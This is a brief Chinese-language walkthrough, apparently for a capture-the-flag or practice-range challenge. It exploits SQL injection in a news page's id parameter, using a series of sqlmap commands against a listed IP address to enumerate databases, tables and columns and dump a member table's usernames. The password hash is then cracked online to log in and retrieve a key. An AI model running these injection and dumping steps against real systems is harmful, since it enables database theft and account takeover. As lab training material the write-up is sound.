1.1.查看帮助和参数:
2.先找注入点:点击登录下面的关于平台停机公告的通知滚动栏
3.来到如下页面
4.修改url,设置and 1 = 2 报错找到注入点
5.使用命令 sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 得到数据库为Mysql
6.输入sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -dbs查看数据库
7.查看数据表:qlmap -u http://219.153.49.228:48953/new_list.php?id=1 -tables -D stormgroup
8.查字段:sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -columns -T member -D stormgroup
9.查字段的值sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -dump -C name -T member -D stormgroup
10.得用户名和加密密码,需要到https://cmd5.com/网站解密
11.登录
12.拿到key